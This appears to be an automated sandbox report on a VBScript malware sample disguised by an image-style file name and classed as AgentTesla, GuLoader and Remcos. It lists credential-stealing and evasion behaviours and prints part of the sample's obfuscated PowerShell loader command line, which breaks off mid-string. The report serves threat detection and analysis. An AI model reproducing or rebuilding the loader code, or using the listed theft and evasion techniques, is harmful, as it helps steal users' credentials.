Edit tour
Windows
Analysis Report
IMG_2022028022-0120.vbs
Overview
General Information
| Sample Name: | IMG_2022028022-0120.vbs |
| Analysis ID: | 755530 |
| MD5: | 752418aa9de96e0fc941ae1e7e33c906 |
| SHA1: | bb67df2d8a4b525b42211630386e4b51a97255a3 |
| SHA256: | cdce0391762117cc926a2131b5e0ec7724b69d1224dbabc7a3f351dfebf9b9bf |
| Infos: |  |
 | |
Detection
AgentTesla, GuLoader, Remcos
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected Remcos RAT
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Creates multiple autostart registry keys
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to harvest and steal ftp login credentials
Uses the Telegram API (likely for C&C communication)
Very long command line found
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses dynamic DNS services
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Classification
- System is w10x64native
wscript.exe (PID: 7408 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\IMG_2 022028022- 0120.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1) 
powershell.exe (PID: 6472 cmdline: C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe" " $Badeansta lt = """re FLiuEfnBrc ExtApiHjoS tnBu HyHFl TDuBSp su{ Hi Cl An P a BapinaCa rZiaSomVo( Cz[PaSDeta lrCaiennOu gDe]Ca`$Ud HBaSUd)Fr; Ag At Ud H o Af`$UsBe uyAktNoePa sBo Sa=Sn ThNAneNowB o-MuOGrbEp jLoeDdcBet Hu TobPayV rtSeeLa[Al ]Po Bd(Me` $VaHTnSDe. ReLPeeNonV egMatunhSl Re/Sk Di2 Gi)Ko;Un g e Ma Is Ge FFloLerWi( fe`$HaiOp= om0Pe;Fu M a`$PhiDo G e-MaltitSe Fa`$SyHBe SBa.DoLUne DenScgDotU nhCa;Do Un `$reiom+Re =Be2Du)Va{ Fl Pl Re A d Ot ta Sp Sk Ho`$Do BFeyDetLee gasSm[Fi`$ geiAf/na2D e]Od Ge=Sa Tr[RecSko UnnLivKres irOrtBr]Il :Me:DaTDio DiBBoyPatG leSu(Po`$U sHHeSPh.bo SFruAfbNes MatUnrPriP onUngLa(Il `$StiPa,Su Jo2Po)Ca, Bl Af1Sn6D u)No;Ma Te Un`$miBKr yPrtCheGts Pa[Du`$Syi Un/Tr2Fi]M i Ta=Ha Ah (Fo`$SiBbi yIntOpeovs Ol[Kb`$spi He/Ar2Fr]F e Ci-FrbRe xEnoPhrTi Hy2St2Re9L a)lo;so Le De Ca Vr} Re Un[MuSk utSqrLaiAp nNogBl]Pe[ MaSChyInsD etpaeNemSt .VaTBaeKax IbtBi.ReEM anPlcGeour dPriMonPrg Sy]Si:Ko:R aAUdSAkCWa IFoIsa.MoG BaeButTaSG utUnrFriUl nIngBa(Ba` $FobSeyPit TheAnsId)l i;Bl}Ga`$D eHBrdSalUn cIr0Sk=KrH OuTBeBAf R y'BeBRe6te 9SpCBe9Be6 Pr9Gr1js8E t0Am8In8Se CEnBCa8co1 In8Ta9Pr8C r9De'Sy;Lu `$plHRvdaf lFocIn1De= TrHDiTZiBV e Un'FeAKr 8Re8TaCDe8 Sl6Gr9Ag7i s8XyASv9Sp 6Sh8CaAHe8 De3Bl9An1u nCTiBteBAb 2Ha8SmCUr8 SuBCuDbu6L kDTi7MaCMe BSeBDe0As8 TrBCh9Ah6M e8To4Pr8Ne 3Fr8In0boA ReBRa8st4T i9Ve1un8Ap COp9dk3Bi8 Co0SuACl8A n8en0Un9In 1Mo8DeDAn8 PeAUd8Wu1R a9Ca6Ba'Fo ;El`$LoHBl dNolSucBo2 Ne=TnHBlTU nBSp Ne'si AFi2Sk8Ti0 Di9Ul1tyBL o5Ob9Fi7no 8ByACe8An6 PoALa4Da8B i1Ka8Im1Wh 9Gt7lo8Ge0 Rr9Br6Br9D i6Ar'Fl;gr `$CyHEidAr lblcPr3pr= OvHenTnoBC o Ta'LeBUn 6re9UpCGu9 Sn6Gn9Fa1B r8Mo0Da8Pr 8LyCOvBBeB wa7Sk9Fo0S a8MaBDe9Ev 1Af8KaCBa8 Oc8Sc8He0N oCObBFoATo CDe8SiBSi9 Se1Be8Or0S e9No7Fl8Hu AOu9ty5RaB Co6Kr8Sk0d d9Se7As9Ri 3Le8laCBr8 we6Ou8Di0o c9Be6DaCKa BTeAUnDPu8 Se4St8IsBE r8si1Ja8Ng 9Li8Sp0FoB Di7Ci8Ex0V i8st3sl'Sk ;De`$FlHPe dJalJdcTi4 Ki=KlHStTP rBFo Ge'Th 9fi6Af9Sy1 Af9Re7He8C rCWi8FoBSt 8Ov2Be'Bl; Al`$AnHInd aclFocBu5T a=OvHDeTWh BUn Ca'UdA De2Sy8Pi0I n9Af1CaARi 8Ha8PrAno8 Sl1Py9Du0G n8Ki9Ud8Po 0MuAUnDNe8 No4Ud8EpBA c8vi1Bj8Sp 9St8Op0An' Af;Se`$OrH BydGrlCicF o6hm=CeHSk TInBHa Di' FaBIn7ApBi n1waBbe6Em 9Re5sa8No0 Wo8Ai6mi8M iCBa8Pa4Sh 8El9NoAStB Fo8Un4Ko8O m8Lo8Ro0St Cfo9ChCco5 SyAJuDAg8A fCCo8In1Ps 8In0FrAMi7 Se9LaCTaBB r6er8TiCAp 8Hu2PoCEp9 SuCLo5miBR e5Ps9No0Wa 8Ko7St8Sa9 po8FuCCr8E g6No'in;Hu `$InHCadUd lRocSt7mi= ReHPrTroBZ e da'NeBPa 7Ri9Di0Un8 chBgn9Ea1K u8SkCMe8Pr 8Su8Di0OvC Ka9MoCSa5S wAUd8Un8Bl 4si8DiBLy8 Un4ur8Gl2F a8Fi0wh8Ne 1Sc'Wa;Dd` $DeHOpdSel NocAz8Tr=B yHDiTSiBPy ev'AvBUn7 Di8tr0Om8I n3Ma8Fr9pr 8ud0Pr8Fe6 Tr9Br1Sl8M i0Gr8In1bi AVe1Hy8Sv0 Ur8Hv9Pl8B l0Kl8Ph2Ni